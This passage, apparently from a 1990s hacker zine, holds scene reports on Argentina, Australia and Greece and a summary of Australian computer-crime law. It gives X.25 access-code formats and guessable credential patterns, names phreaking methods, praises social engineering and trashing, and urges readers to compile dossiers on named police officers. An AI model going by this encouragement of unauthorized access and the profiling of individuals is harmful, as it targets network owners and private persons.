+     - Reverse charge request and acceptance.
+     - Multipoint access
+     - Incoming/outgoing call blocking.
+     - Incoming/outgoing call blocking to and from CUGs.
+
+     Obviously these features, should you accept them, imply a little
+     extra bucks in your Arpac bill (which will self-destroy your wallet in
+     five secs.).
+     Startel, the company that runs ARPAC, uses a unit called PTD (it stands
+     for Data Transmission Packet in Spanish) for billing purposes.
+     Packets are 128 bytes and conform a PTD, transmission of 64 bytes or
+     less are considered as 1/2 PTD.
+     Startel vacuum cleans it's customers bank accounts this way:
+     1) A one time payment for the installation of the X.25 equipment.
+     2) A "basic monthly payment" that does not include data traffic.
+     3) A "variable monthly payment" that depends on the number of PTDs
+        handled by Arpac.
+
+     As for December 1993 this was calculated considering a fee of $0.007595/PTD
+     and 1 PTD/min for leased lines + 4 PTD/min for dialup access. Also
+     remember that those dialing from the PSTN are paying the local call
+     too.
+     There are discounts based on the day of week and hour of the
+     connection:
+     - Type "A" fee (normal fee)            Mon-Fri   06:00-20:00
+     - Type "B" fee (40% discount)          Mon-Fri   20:00-24:00
+     - Type "C" fee (60% discount)          Mon-Fri   24:00-06:00
+                                            Sat.      20:00-06:00
+                                            Sun. and
+                                            Holidays  00:00-24:00
+
+     International connections are not considered in this figure and are
+     billed according to Telintar (LD carrier) fees.
+     A 8% or 18% tax is applicable to all payments. Customers can also
+     choose a fixed monthly payment instead of basic+traffic payments.
+
+     The software used is that of ITAPAC (DNIC 2222) and as far as i know
+     theres no support to mnemonics instead of the plain X.121 addressing.
+     Nuas are DNIC+10 digit composed this way:
+
+      [07222]XXXX YYYYY PP
+             ^^^^\^^^^^\^^\__  port/subaddress
+                   \     \
+                     \     \_  host
+                       \
+                         \ __  corresponds to a "nodal area" in Startel's
+                               jargon,usually associated with geographic
+                               location.
+                               Some valid entries here are:
+                                2111,2141,2171,2511,2211,2911,2172,2912...
+
+    NUIs, IURs in Startel's babbling, are formed like this:
+
+    9XXXXXXXX/YYYYYY
+     ^^^^^^^^\^^^^^^\_ this is the password, normally 5/6 alphanumerics,
+               \       all uppercase.
+                 \
+                   \__ da nui! X is in the [0-9] range and generally the whole
+                       8 digits correspond to one of the subscriber's DNs.
+
+    So if you were to use ARPAC you'd make a call by typing
+
+       .. <enter> upon connection (7E1, <= 2.4kbds)
+
+      then
+
+       N9<XXXXXXXX>/<YYYYYY>-<nua>   ; when using a NUI. or
+
+       <nua>                         ; w/o NUI needs Reverse Charge
+                                     ; Acceptance of course.
+
+    You don't wanna call them NUIs when talking to Startel personnel
+    (i.e. social  engineering)  unless you want to become instantly suspected
+    to be an evil phraudster (aka haq3R).
+
+  "CIBA", The Infamous, or BT Tymnet's retarded child (DNIC==7220)
+  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+    If you cared enough to read the BT Tymnet's worldwide dialups listing
+    you probably noticed a few entries for Argentina. These were regularly
+    used by "net explorers" in the mid 80's and were known as "CIBA" among
+    them. CIBA dialups are 300bds (wow!) and use CCITT v.21 protocol (ATB0
+    for your modem). At that time the fastest ARPAC dialup was 1200bds.
+    All in all CIBA is nothing more than the door to BT Tymnet in
+    Argentina (node 7407, host 1212). There's no direct access to interesting
+    utilities such as "xray" and the likes.
+    NUIs here were stupidly choosen and easily scanned since they followed
+    two known patterns:
+       naargXXXXna , and
+       enargXXXnet  X being in the [0-9] range.
+    Many of these were not passworded. Of course no one would even think to
+    scan NUIs at 300bds nowadays...
+
+  Internet
+  ~~~~~~~~
+
+    The Internet is rarely know and even less used in the student,
+    professor, computer and communications professionals circles. It's a
+    depressive experience to explain the workings of "telnet","rlogin","ftp"
+    and such "eccentricities" to people who were supposed to know about them
+    from their TCP/IP books, courses and lectures. You, reader, could
+    allege that a networked unix system is enough to explain this, but
+    despite the technical explanations, the political, economic and social
+    implications of the Internet will remain unknown until a vast amount of
+    persons actually USE and EXPERIENCE it. And I'm not talking about
+    "Joe citizen" here, I'm talking about people that would actually NEED
+    the net if they were to improve their work.
+    It's like describing the taste of an apple to someone, he'll
+    surely understand what you say but don't expect him to understand what
+    it tastes like until he actually bites it.
+
+    The Internet top level authority in Argentina is the Foreign Relations
+    Ministry and its link to the rest of the world is sponsored by the
+    'United Nations Development Programme'. 'whois' output follows:
+
+     United Nations Development Programme (NET-ARNET)
+        Ministerio de Relaciones Exteriores y Culto
+        Reconquista 1088 ler. Piso - Informatica
+        Buenos Aires
+        ARGENTINA
+
+        Netname: ARNET-NET
+        Netnumber: 140.191.0.0
+
+        Coordinator:
+          Amodio, Jorge Marcelo  (JMA49)  PETE@ATINA.AR
+          +54 1313 8082
+
+        Domain System inverse mapping provided by:
+
+          ATINA.AR   140.191.2.2
+          ATHEA.AR   140.191.4.10
+
+        Record last updated on 06-May-91.
+
+    Argentina has only an UUCP link (well, once again this is just the publicly
+    known info...) to the Internet through UUNET, connecting several uucp
+    linked networks to it (RAN,RECYT,etc). Atina.ar is the most important
+    host in this scheme, seconded by the Science and Technology Secretary's
+    host (SECYT) and the University of Buenos Aires (UBA) host located at
+    the Exact and Natural Sciencies Faculty in a dependency known as the
+    "CCC".
+    There's also a company the offers Internet connectivity bypassing atina
+    and uunet. 'whois' output:
+
+     SatLink Uucp/Internet (SATLINK-DOM)
+        Casilla de Correo 3618
+        (1000) Correo Central
+        Buenos Aires
+        ARGENTINA
+
+        Domain Name: SATLINK.NET
+
+        Administrative Contact, Technical Contact, Zone Contact:
+          Stolovitzky, Horacio  (HS3)  postmaster@SATLINK.NET
+          +54-1-983-6740
+
+
+        Domain servers in listed order:
+
+          NKOSI.WELL.SF.CA.US          192.132.30.4
+          WELL.SF.CA.US                192.132.30.2
+
+        Record last updated on 24-Mar-93.
+
+    There are other links that bypass atina and uunet, all of them part of
+    corporate networks. (i.e. IBM's VNET, etc)
+
+    Although everyone says theres only a UUCP link to the Internet, word is
+    that there are a few hidden 9600bds leased lines shared among many hosts
+    at some sites, at any rate this is completely insufficient for servicing
+    researchers, students and other interested parties, thus the existence
+    of these links is kept as a sort of secret.
+
+    64kbds links are supposed to be installed  for interactive sessions
+    this year at certain sites.
+
+  Other networks
+  ~~~~~~~~~~~~~~
+    Many companies form their corporate networks as CUGs on Arpac, have
+    their own network, or both. Telcos, consulting firms, banks and
+    insurance companies fall in these categories  and are quite interesting
+    research projects for the inquisitive hacker.
+
+
+The "Scene"
+~~~~~~~~~~~
+    There's not much to say about the Argentinian scene. Given the cost
+    and the time you have to wait to get a phone line installed there
+    aren't many BBSes up 24hrs. Most of them are up during nighttime, from
+    10:00/11:00 pm to 6:00/7:00am, of these, very, very few are dedicated to
+    hack/phreak topics.
+    Also, considering that theres no decent internet access at your local
+    university you would be forced to explore X.25 networks in order to
+    fulfill your natural interest and seek of knowledge.
+    But there aren't many hackers either. Most Argentinians you'll find on
+    the nets are mere abusers with one final goal: to get to QSD or the
+    likes. While this sounds rather amusing (eh) there's an explanation to
+    it.
+    In the mid 80's a few Argentinians used to exploit CIBA's clueless
+    procedures for choosing NUIs. At that time the fastest ARPAC dialup
+    was 1200bds so 300bds was not that bad after all, and not bad at all
+    as you were sure you could find a new NUI in a matter of hours.
+    Yes, many people wasted their diminishing lifes in QSD, but for some this
+    new x.25 thingie was more than a mean for meeting friends over the net
+    and having endless chats with them, some needed to learn and understand
+    the workings of the nets and the many different systems hooked to it.
+    For those the place was Altos, and AMP (although you couldn't connect to
+    PSS directly). And Altos proved to be of great help for Argentinians
+    that got introduced to the hack/phreak world not on a BBS but right on a
+    X.25 network. And so did the sequel of Korn-chat sites (tchh,lutzifer,
+    italian "artemus") or even Pegasus and LINA sometimes.
+    Around '89 or '90 an Efinet (Efinet == Fidonet wannabe) meeting was held,
+    and during it someone gave out a "strange bunch of numbers in the form
+    of some sort of code or something" (this being an ARPAC NUI followed by
+    QSD's NUA) and the attendees ran home and tested it, just to see them
+    connected to the France chat extrordinaire. Meanwhile, things were
+    getting hot elsewhere in the world, and those once famous X.25 hangouts
+    went virtually dead, so these newcomers wouldn't get in touch with
+    Argentinian hackers (as they wouldn't appear in QSD) or other countries'
+    hackers (as they were having a bad time or retiring or simply leaving
+    X.25 alone). So, even if they wanted to learn, these freshmen, for good or
+    for bad, were on their own and still are...
+
+    The vast majority of the argentine society never heard the words "hacker"
+    or "phreaker" or, if they did, they relate it to things happening in
+    other countries, far, far away.
+    It wasn't until '93, in accordance with the apparently boundless tendency to
+    use the word "cybersomething" when referring to anything remotely related to
+    new technologies, computers, or scifi novels or any other thing that
+    requires publicity, i.e. see cyberIdol's cybershitty cyberCD to understand
+    what I cybermean, uhg excuse me, back to the point...
+    It wasn't until '92 or '93 that the media discovered this brilliant trend
+    for selling more and more, apparently some genius said: "Hey, what if we
+    sell the future? What if we write about how will life be, how  will
+    technology be, how will the planet be, how will your dog be? All this
+    with some vague journalistic odor of course. I bet we will sell more!".
+    So they did, and in this frame the hacker/phreak scene is more like the
+    salt to dress the salad, yet things didn't get to the extreme of
+    sensationalism and hacking is portrayed as an activity bound to some
+    new sort of romanticism, still things are very much confused, putting
+    hackers, phreakers, crackers, pirates, virii authors and mere fraudsters all
+    together in the same bag (yes, but what would you expect anyway?). Even some
+    interviews to an ex-hacker (who now runs a data security firm), and a
+    self proclaimed "expert" ( more a virus expert, IF anything) have
+    appeared.
+    On the other side,  many "eleet poseurs" have appeared too, but as one
+    could expect, they are nothing more than mere poseurs and certainly not
+    worth more than a phrase here.
+
+Final Words!
+~~~~~~~~~~~~
+    This is the 'scene' AS I SEE IT, i don't consider myself an enlightened
+    entity, thus I acknowledge my description might not be objective nor
+    complete (in fact it might be complete bullshit but, do I care? do YOU
+    care?).
+    Argentina is a country where lots of things are still there, waiting to
+    be discovered, virgin beaches for you to explore and enjoy. Security is
+    generally lax, and people is generally not security-aware and even less
+    hacker-aware, trashing and social engineering are simple things that DO
+    give many benefits.
+    As far as I know theres no specific law dealing with computer related
+    crimes (whatever that mean...), and as long as you don't get yourself
+    involved in the traditional crime pictures you are pretty much safe.
+    On the other hand, the bad and expensive phone service, the lack of
+    internet connectivity and the limited number of BBSes dedicated to the
+    so called "underground" (yes, I did it, I used the damned word, argh)
+    make things tougher for newcomers.
+
+    Perhaps the most interesting thing is that there's not much knowledge of
+    what hacking/phreaking means and this gives us an unique opportunity to avoid
+    misunderstandings and errors that occurred in other countries. Perhaps
+    it is possible to influence people in a positive way, making them think
+    about secrecy, security, privacy and responsibility issues. We are
+    still free of Geraldos, we didn't suffer witch hunts ala Operation
+    Sundevil, the words "hacker" and "phreaker" have not been demonized yet,
+    although the Orwelian-way is common practice among the telcos, but
+    nobody seem to give a fuck about this, or maybe nobody notice?.
+
+    So, this is it, the file has come to an end and I think it's enough
+    for an introduction, I did not cover cellular telephony nor satellite
+    links and companies providing related services, I did not mention many
+    other things but my intention was to write a description of how things
+    are here, not a fucking encyclopedia.
+
+    If you think that many topics are deliberately vague and not covered
+    in deep, that some information might be not accurate or if you don't
+    agree with anything I've stated you can contact me at:
+
+          HBO            +541-788-4850 24hrs.
+          Loser's joint  +541-658-7983 23:00-6:00 (GMT -3)
+
+    Here's my PGP key. DO USE IT OR EXPECT NO REPLIES
+
+-----BEGIN PGP PUBLIC KEY BLOCK-----
+Version: 2.3a
+
+mQCNAi1EBdUAAAEEAMdEmi+ajN/WIIvN3jjUQk/wb0CLsXe+K49fX8DuUXvUSpdJ
+UCu8wFH82reJWttj3vaMQ/guKADC/VTIbfsRGWZhbvc+7Mb0W/3LPJSj5zpG9O+M
++XF6A7eB6IfncS+p9jU5Tb9lMc/H0BoW4VTpYO/eWK9DJGfAFOA/puxL3X5tAAUR
+tB1PUGlpIDxvcGlpQGJpYXBiYS51YmEuZWR1LmFyPg==
+=rKbG
+-----END PGP PUBLIC KEY BLOCK-----
+
+------------------------------------------------------------------------------
+
+               The
+           Australian
+           Underground
+     ( or The lack thereof! )
+
+               by
+
+            Data King
+
+
+ATTITUDE
+
+For several years now the Australian underground scene has turned better yet
+worse at the same time. The amount of companies and colleges using datacomm
+has dramatically increased. In my opinion it is still not yet to the stage of
+America in this respect though.
+
+The number of 'hackers' has increased, but I use the term loosely as I do not
+consider many of these so called 'hackers' to be hackers. Why do I say this?
+I say this because most people who hang out in the underground scene in
+Australia consider hacking to be getting an account at a university off of a
+friend and then snarfing the password file and running crack over it. They are
+only interested in things that will give them access to IRC, FTP & Newsgroups.
+( No flames please I am talking in general here! )
+
+Many of them have never heard of services like MIDAS, Minerva & AUSTPAC and
+even if they were given a dialup to one of these services I doubt they would
+have a clue about how to use it. We have a wealth of services out there just
+waiting to be tried, but there is almost no one who is interested in doing so,
+to give you an example. One night I was working away on my box at about 3am and
+a 'hacker' mate had crashed on the couch. I went to dial into one of the local
+universities and I misdialed the number.  At first I didn't realize that I had
+dialed the wrong number since I got a carrier. My modem connected and then just
+sat there instead of the usual annex prompt. I bashed the old enter key a
+few times and suddenly I was presented with a menu to an accounting system.
+
+'Sheet,' I thought, and screaming to wake my mate up ( at this stage I thought I
+had connected to the university and it hadn't reset the line after the last user
+hung up ) I started to explore the system, it soon became evident that it wasn't
+the university but something entirely different, by this time my 'hacker' mate
+had woken up. 'Whaaaaaaaaat?' comes the response from the couch, I briefly
+explained what had transpired and his only response was 'Ughhhhh' as he went
+back to sleep. Needless to say I spent the next 3 hours playing with the
+system, and by the time I had finished I could crash the accounting menu and
+exit to the operating system.
+
+The system turned out to be fairly boring and proved to be of no use to me,
+BUT I had to assume that before I knew, it could have been something really
+interesting and to spend time fully exploring it, where as my 'hacker' mate
+couldn't give a stuff, 'coz it wasn't on internet'.
+
+TECHNIQUES
+
+Australian Hackers no longer seem to be using advanced techniques to penetrate
+a system, very few would have any idea how to use TCP/IP to gain access to a
+system. Most satisfy themselves with obtaining an id elsewhere and then
+snarfing the password file and running crack over it. When it comes to things
+such as VMS the attitude I usually encounter is "VMS urgh, what bloody good
+is it!". There are some very good Hackers in Australia but most of them do
+not hang around in the underground scene, rather they are usually university
+students who learn how to make the best use of the system. Writing things like
+ICMP bombs, and Sniffers is usually left to these people, in fact I can not
+think of any active non university student hacker who lives in Australia and
+uses these sort of techniques.
+
+CONS
+
+To the best of my knowledge there has only ever been one underground conference
+in Australia, and that was from memory in 1984, it was called Hackfest and it
+was nothing compared to HOHOCON or Hacking at the End of the Universe.
+
+At the time we all thought it was great, and I must admit it did boost the
+sharing and finding of new info for a while.
+
+I, in association with  one or two others, have been thinking of arranging
+another Hackfest to be held in 1994, it will probably be held in Melbourne,
+Australia. If you live in Australia and would like to attend then mail me
+and I will keep you informed. ( Det. Sgt. Ken Day: Don't bother trying to
+spy on Hackfest if it goes ahead, you're more than welcome to attend! )
+
+NETWORKS
+
+In Australia we have several national and international networks, here is a
+list of some of them:
+
+MIDAS       International Packet switching network DNIC = 5053
+Minerva     Automated Office Network w/ International PSS
+AUSTPAC     Australian Packet Switching Network DNIC = 5052
+SprintNET   Need I explain this???
+AARNET      The Australian Network that covers Internet in Australia
+TRAN$END    Subset of Austpac ( used by Banks for ATM/EFTPOS transmissions )
+Compuserve  Need I explain this???
+Discovery   Australian Videotext system ( Not sure if still in Service )
+?????       The Australian Military Network ( Don't know its name )
+TAXLAN      The Australian Tax Office ( IRS ) Network
+
+PHREAKING
+
+For years people in Australia believed that phreaking was only really possible
+by pitting, this included Telecom Investigations Department, but we know that
+this is not true. Methods that have been used in Australia include:
+
+Blue Boxing off of an American Operator Line
+Pitting ( ie: Linemans handset connected to a telecom junction box )
+Clicking ( Electric shock to a public phone )
+Boxing off of a disconnected number ( almost impossible now )
+Calling Cards ( both American and now Australian Calling Cards )
+PBX's ( 0014-800's and local PBX's )
+Mobile Telephones ( ie Cellular Phones and b4 that the old Radio mobiles )
+
+There are probably other methods as well but I am not a phreaker so I am not
+the best person to comment on this. Boxing in Australia is getting dangerous
+now as we are getting more and more of the new digital exchanges which make it
+a lot easier to trace, or at least so I am told.
+
+There were some people in South Australia making/recharging Telephone cards,
+( Like a disposable calling card, but you buy them in news agents and they
+have a dollar value, once used up you throw them away ) but these people were
+apparently caught and telecom have taken measures to ensure that this is no
+longer possible.
+
+VMB'S
+
+We have a large range of VMBs in Australia, and with the proliferation of
+VMBs has come the art of Hacking VMBs, we even have people here in Australia
+that do virtually nothing else other than play with VMBs. These people tend
+to go a lot further than just cracking the pin numbers, some of them have
+learned enough about the signalling systems used by these systems to virtually
+take control of the system and make it do what they want. Once again this is
+an area that I do not know a lot about.
+
+We also have a couple of individuals that run something called the Scene Inpho
+line, Which essentially is a VMB with a long recorded message giving out tips,
+rumors, and general rubbish. The number to the Scene Inpho Line unfortunately
+constantly changes as the owners of the VMB notice what's going on and shut
+that particular box down.
+
+BULLETIN BOARDS
+
+There are not a lot of good underground BBS's in Australia, a couple that I
+know of that come to mind are Destiny Stone II, Empire of Darkness,
+& Watchtower. I can not comment on Destiny Stone II as I have never called it.
+However, when I used to called Empire of Darkness it was so lame it wasn't funny
+and now he has gone 96+ only I can't call it ( I'm poor and can't afford a
+new modem ;) ).
+
+Watchtower showed potential but unfortunately the sysop of it is very slack and
+needs to get off of his butt and do some work on it! The underground boards in
+Australia tend to reflect the general state of the scene, ie: complete and total
+apathy!
+
+Most H/P boards in Australia are also warez sites and tend to be pretty lame and
+insecure because of all the warez puppies on them, I can not think of a really
+good board in Australia that is still operating.
+
+BUSTS
+
+In the last year the Australian Federal Police, Computer Crimes Unit has been
+quite busy raiding people. As a result there have been 4 convictions that I
+know of, and another 2 people waiting for charges to be laid.
+
+The people convicted and there sentences are as follows:
+
+Data King (me) Guilty but no record ( escaped conviction under section 19b of
+               the act ) $300.00 fine and $500 2 year Good Behavior bond.
+               ( Pleaded Guilty to 2 Charges )
+
+Electron       6 Months Jail ( suspended sentence ), $500  6 Month Good
+               Behavior bond, & 300 hours Community Service Work.
+               ( Pleaded Guilty to 14 Charges )
+
+Nom            6 Months Jail ( suspended sentence ), $500  6 Month Good
+               Behavior bond, & 200 hours Community Service Work.
+               ( Pleaded Guilty to 2 Charges )
+
+Phoenix        12 Months Jail ( suspended sentence ), $1000 12 Month Good
+               Behavior bond, & 500 hours Community Service Work.
+               ( Pleaded guilty to 15 Charges )
+
+In the most part people get busted in Australia due to either their stupidity
+( Hi Phoenix! ), being lagged in by some low life, or by trusting someone they
+should not of ( Hi Phoenix! ).
+
+LEGALITIES
+
+Both Hacking and Phreaking have been illegal in Australia for quite a few years
+I will not go into details here as hopefully there will be an article in this
+issue of Phrack covering the laws and possible penalties.
+
+Computer Crime in Australia is the responsibility of the Australian Federal
+Police Computer Crimes Unit. The people known to us in this unit are:
+
+Det. Sgt. Ken Day
+Det. Neil Campbell
+Det. Steve Visic
+
+( Sorry guys if I spelled your names wrong - NOT! ;) )
+
+If you are able to add any names to the list, please mail them to me and any
+other info you have on them. That way we can begin to build up a dossier on
+our enemies!
+
+PUBLIC
+
+There seems to be a growing awareness in the general populace of Australia.
+There has been quite a bit of media hype on hacking over the last year, and
+slowly the public seems to be getting a great fear of hackers. To me it seems
+ridiculous, as the only real hackers that the public should have feared lived
+in the early 80's. Today's generation of Australian hackers are pretty HOPELESS
+in my humble opinion. To give an example, when Electron, Nom, & Phoenix's court
+cases were getting media attention I was sitting in my parent's lounge room one
+night when the news was covering their sentencing. My father thought that
+these people were very dangerous and should have gotten a bigger sentence than
+they did.  At this time he did not know about my bust. I have explained it to
+him now but he still doesn't seem to understand...oh well that life I guess.
+
+CONCLUSION
+
+This is how I see the Australian scene, If you disagree, want to comment, send
+me info for future articles, get on the hackfest mailing list, or just want to
+have a chat you can mail me at:
+
+   dking@suburbia.apana.org.au
+
+If you require privacy you can send me stuff that is encoded via pgp, my
+pgp public key is as follows:
+
+-----BEGIN PGP PUBLIC KEY BLOCK-----
+Version: 2.0
+
+mQCNAi0t3M4AAAEEAMPZMexyZ+Nxz8Ry1w9R7pTLFGM7xk0MwJ/izS687UIJLzc5
+l38jFM0bEcuSukRrLkBYIDdiAgOdn50cJmKOPyvE4FvR2eh2dbdHyFKzaVWVe5zE
+HZhNx2o0kb6SRIQHu8Vh/pkl+S29RKzDbIgMLLjOCwN0V1/RUal4ROOqDaCbAAUT
+tCdEYXRhIEtpbmcgPGRraW5nQHN1YnVyYmlhLmFwYW5hLm9yZy5hdT4=
+=ttmq
+-----END PGP PUBLIC KEY BLOCK-----
+
+
+I can also usually be found on IRC a couple of hours a night in these channels
+under the nick of dking:
+
+ #apana  #hack  #phreak  #linux
+
+
+Thanks for assistance with this file go to:
+
+           SPiN-DoC        Olorin
+
+                      &
+
+                Connie Lingus
+       ( Motivational Support - <SMILE> )
+
+Have phun, and remember:
+
+      BE CAREFUL OUT THERE!
+
+ ==============================================================================
+
+              ()()()()()()()()()()()()()()()()()()()()()()()()()
+              ()                                              ()
+              ()          "Australian Hacking Laws"           ()
+              ()                                              ()
+              ()                 21/01/93                     ()
+              ()                                              ()
+              ()                            (c) Data King     ()
+              ()                                              ()
+              ()()()()()()()()()()()()()()()()()()()()()()()()()
+
+
+                     Crimes Act 1914 (Commonwealth)
+                     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Part VIA - Offences Relating to Computers
+
+Section 19B (1) Order & Recognizance
+
+The Court can discharge you under this section, with a surety and/or
+recognizance given by you.
+
+If discharged under this section you may be put on a good behavior bond
+of up to but not exceeding 2 years. Other conditions may be placed on you
+by the court also, this conditions can be anything that the court considers
+appropriate.
+
+To have this section come into effect the following must apply:
+
+The Court is satisfied that the charge(s) are proved, but is of the opinion,
+having regard to:
+
+ The Character, Antecedents, Age, Health, & Mental Condition
+
+that it is unexpedient to inflict any punishment or any punishment other
+than a nominal one on you.
+
+Basically what this means is that you can be found guilty and not have a
+conviction recorded against your name, but you must realign that the
+department of public prosecutions may object to this and then you will have
+to try and convince the Judge to ignore what the DPP says, (not easy).
+
+Also please realign that if you were to receive a section 19B and then were
+caught doing naughty things again and you are still under your good behavior
+bond, you will forfeit your bond and have to stand trial again for the
+original offence(s).
+
+Section 74A - Interpretation
+
+(1) In this part, unless the contrary intention appears:
+
+"carrier" means:
+
+        (a) a general carrier within the meaning of the Telecommunications
+        Act 1991; or
+
+        (b) a mobile carrier within the meaning of that Act; or
+
+        (c) a person who supplies eligible services within the meaning of
+        that Act under a class licence issued under section 209 of that Act;
+
+"Commonwealth" includes a public authority under the Commonwealth;
+
+"Commonwealth computer" means a computer, a computer system or a part of a
+computer system owned, leased or operated by the Commonwealth;
+
+"Data" includes information, a computer program or part of a computer program.
+
+(2) In this Part;
+
+        (a) a reference to data stored in a computer includes a reference to
+        data entered or copied into the computer; and
+
+        (b) a reference to data stored on behalf of the Commonwealth in a
+        computer includes a reference to:
+
+                (i) data stored in the computer at the direction or request
+                of the Commonwealth; and
+
+                (ii) data supplied by the Commonwealth that is stored in the
+                computer under, or in the course of performing, a contract
+                with the Commonwealth.
+
+
+Section 76B - Unlawful access to data in Commonwealth or other computers
+
+(1) A person who intentionally and without authority obtains access to:
+
+        (a) data stored in a Commonwealth computer; or
+
+        (b) data stored on behalf of the Commonwealth in a computer that
+        is not a Commonwealth computer;
+
+IS GUILTY OF AN OFFENCE - PENALTY: Imprisonment for 6 months
+
+(2) A person who
+
+        (a) with intent to defraud any person and without authority obtains
+        access to data stored in a Commonwealth computer, or to data stored on
+        behalf of the Commonwealth in a computer that is not a Commonwealth
+        computer; or
+
+        (b) intentionally and without authority obtains access to data stored
+        in a Commonwealth computer, or to data stored on behalf of the
+        Commonwealth in a computer that is not a Commonwealth computer, being
+        data that the person knows or ought reasonably to know relates to:
+
+                (i) the security, defense or international relations of
+                Australia;
+
+                (ii) the existence or identity of a confidential source of
+                information relating to the enforcement of a criminal law of
+                the Commonwealth or of a State or Territory;
+
+                (iii) the enforcement of a law of the Commonwealth or of a
+                State or Territory;
+
+                (iv) the protection of public safety;
+
+                (v) the personal affairs of any person;
+
+                (vi) trade secrets;
+
+                (vii) records of a financial institution; or
+
+                (viii) commercial information the disclosure of which could
+                cause advantage or disadvantage to any person;
+
+IS GUILTY OF AN OFFENCE - PENALTY: Imprisonment for 2 Years
+
+(3) A person who:
+
+        (a) has intentionally and without authority obtained access to data
+        stored in a Commonwealth computer, or to data stored on behalf of the
+        Commonwealth in a computer that is not a Commonwealth computer;
+
+        (b) after examining part of that data, knows or ought reasonably
+        to know that the part of the data which the person examined relates
+        wholly or partly to any of the matters referred to in paragraph
+        (2)(b); and
+
+        (c) continues to examine that data;
+
+IS GUILTY OF AN OFFENCE - PENALTY: for contravention of this subsection:
+                                   Imprisonment for 2 years
+
+Section 76C - Damaging data in Commonwealth and other computers
+
+A person who intentionally and without authority or lawful excuse:
+
+        (a) destroys, erases or alters data stored in, or inserts data into a
+        Commonwealth computer;
+
+        (b) interferes with, or interrupts or obstructs the lawful use of a
+        Commonwealth computer;
+
+        (c) destroys, erases, alters or adds to data stored on behalf of the
+        Commonwealth in a computer that is not a Commonwealth computer; or
+
+        (d) impedes or prevents access to, or impairs the usefulness or
+        effectiveness of, data stored in a Commonwealth computer or data stored
+        on behalf of the Commonwealth in a computer that is not a Commonwealth
+        computer;
+
+IS GUILTY OF AN OFFENCE - PENALTY: Imprisonment for 10 years
+
+Section 76D - Unlawful access to data in Commonwealth and other computers by
+              means of certain facilities.
+
+(1) A person who, by means of a facility operated or provided by the
+Commonwealth or by a carrier, intentionally and without authority obtains
+access to data stored in a computer.
+
+IS GUILTY OF AN OFFENCE - PENALTY: Imprisonment for 6 months
+
+(2) A person who:
+
+        (a) by means of a facility operated or provided by the Commonwealth
+        or by a carrier, with intent to defraud any person and without
+        authority obtains access to data stored in a computer; or
+
+        (b) by means of such a facility, intentionally and without authority
+        obtains access to data stored in a computer, being data that the
+        person knows or ought reasonably to know relates to:
+
+                (i) the security, defense, or international relations of
+                Australia
+
+                (ii) the existence or identity of a confidential source of
+                information relating to the enforcement of a criminal law of
+                the Commonwealth or of a State or Territory;
+
+                (iii) the enforcement of a law of the Commonwealth or of a
+                State or Territory;
+
+                (iv) the protection of public safety;
+
+                (v) the personal affairs of any person;
+
+                (vi) trade secrets;
+
+                (vii) records of a financial institution; or
+
+                (viii) commercial information the disclosure of which could
+                cause advantage or disadvantage to any person;
+
+IS GUILTY OF AN OFFENCE - PENALTY: Imprisonment for 2 Years
+
+(3) A person who:
+
+        (a) by means of a facility operated or provided by the Commonwealth
+        or by a carrier, has intentionally and without authority obtained
+        access to data stored in a computer;
+
+        (b) after examining part of that data, knows or ought reasonably to
+        know that the part of the data which the person examined relates wholly
+        or partly to any of the matters referred to in paragraph (2)(b); and
+
+        (c) continues to examine that data;
+
+IS GUILTY OF AN OFFENCE - PENALTY: Imprisonment for 2 Years.
+
+Section 76E - Damaging data in  Commonwealth and other computers by means of
+              certain facilities
+
+A person who, by means of a facility operated or provided by the Commonwealth,
+intentionally and without authority or lawful excuse:
+
+        (a) destroys, erases or alters data stored in, or inserts data into a
+        computer;
+
+        (b) interferes with, or interrupts or obstructs the lawful use of,
+        a computer; or
+
+        (c) impedes or prevents access to, or impairs the usefulness or
+        effectiveness of, data stored in a computer;
+
+IS GUILTY OF AN OFFENCE - PENALTY: Imprisonment for 10 Years.
+
+Section 76F - Saving of State and Territory Laws
+
+Sections 76D and 76E are not intended to exclude or limit the concurrent
+operation of any law of a State or Territory.
+
+                                Conclusion:
+                                ~~~~~~~~~~~
+You may have noticed that any hack of a Computer in Australia could result in
+you staying in a prison for quite a long time, as almost any hack would be
+and offence under just about all of the subsections listed above, combine this
+with a consecutive sentence and you *COULD* be in jail for over 25 years.
+
+                          "Be Careful Out There!!"
+
+------------------------------------------------------------------------------
+
+
+  -- The HELLenic Digital Subculture Scene --
+        by Opticon the Disassembled
+
+
+- "EL33t3 Hackers": "TH3rE R N0 UNKraKKable ZyZTEMZ.EV3ry1 HAS[S] It's H0L3z."
+- I'm sure every "EL33t3#@$$^!!! HaKKER" has at least one hole by nature.
+
+
+ "The Gods could have chosen any place but they chose Greece"...Yes, they did.
+By mistake probably.
+
+ Agricultural country, light industry, member of the European Community, ten
+million residents, surrounded by sea (polluted in some areas) and forests
+(burned in some areas). Four thousand years old culture, beautiful language
+(due to it's ancientness) [...]
+
+ Digital subculture scene?  Quite a few articles appear on newspapers and
+magazines about CyberPunk.  Quite a few people claim to be hackers (elite ones),
+crackers (elite ones), phreakers (elite ones) and coders (elite ones).
+University students get insane pleasure when talking about their last
+achievements, how they cracked all the accounts of a shadowed password file,
+and how they transferred 2000 true color, porno JPEG and phracking files.
+Public bulletin board systems distribute blue boxing related articles (Hail
+Mark Tabas!) and pirate boards distribute "oNE DaY WAREZ!@!#".
+
+ "Phone freaks, crackers, hackers, virus makers." At the end, an interview
+with a young software cracker.  He listens to TECHNO ("the only real music"),
+he would like to buy an Apple Powerbook and he needs only five minutes to
+"crack a disk".
+
+ No busts have taken place AS FAR AS I KNOW. Only innocent pirates and couriers
+were prosecuted years ago, due to distribution of cracked programs for ZX
+Spectrum, Commodore and Amstrad ("peeks, pokes, hints & tips").
+
+ An article about "Legion Of Doom! - ComSec" appeared on November 1991:
+"X-Hackers offer their services to companies". Glamorous picture of the
+group, opinions, history, comments from a phracking illiterate journalist.
+
+ An-archic 'zines (printed format) were publishing digital underground related
+news, since mid '80s.
+
+ A family man in my city has been using a black box for 10 years.  He accepts
+calls from relatives living in Italy.
+
+ At the age of seventeen Nikos Nasoyfis wrote a book about 8088/8086 assembly
+programming and cracking of protection methods. He is considered to be a
+genius in those areas. Upon the request of a magazine he created "the first
+Hellenic virus".
+
+ No Digital Underground / An-archy related systems exist, except DiES IRAE.
+But of course " If [When] you are good, nobody knows that you are there ".
+
+
+* Packet Switching Data Networks
+
+
+ SERVICE:  HELLASPAC
+ DNIC:  2023
+                           LOG-IN PROCEDURES
